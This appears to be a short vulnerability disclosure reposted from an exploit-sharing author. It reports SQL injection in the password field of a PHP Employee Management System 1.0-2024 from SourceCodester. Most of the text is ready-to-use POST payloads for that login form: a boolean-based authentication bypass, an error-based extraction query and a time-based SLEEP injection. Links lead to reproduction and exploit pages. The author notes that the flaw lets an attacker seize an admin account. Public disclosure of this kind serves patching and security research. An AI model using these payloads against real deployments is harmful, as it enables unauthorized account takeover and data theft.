Employee Management System 1.0-2024 SQL Injection – Torchsec
## Author: nu11secur1ty
## Date: 03/01/2024
## Vendor: https://www.sourcecodester.com/users/walterjnr1
## Software: https://www.sourcecodester.com/php/16999/employee-management-system.html
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
Potential SQLi detected in password parameter. Please confirm it
manually... The payload from the puncher_SQLi_bypass_authentication
module was submitted successfully after the test. You must test
manually to confirm this vulnerability! By using this vulnerability
the attacker
can get control against an admin account and even more bad things!
STATUS: HIGH- Vulnerability
[+]Payload:
```mysql
---
Parameter: txtpassword (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR NOT
2215=2215# TKHd&btnlogin=
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' OR (SELECT
2145 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT
(ELT(2145=2145,1))),0x716a787171,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)# JjHm&btnlogin=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: txtusername=WKFNZjdP&txtpassword=y6Q!i4e!W6' AND (SELECT
3563 FROM (SELECT(SLEEP(7)))nLaZ)# ZzRM&btnlogin=
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/Walterjnr1/2024/employee_akpoly-1.0-2024)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2024/03/employeeakpoly-10-2024-multiple-sqli.html)
## Time spend:
00:35:00
Gloss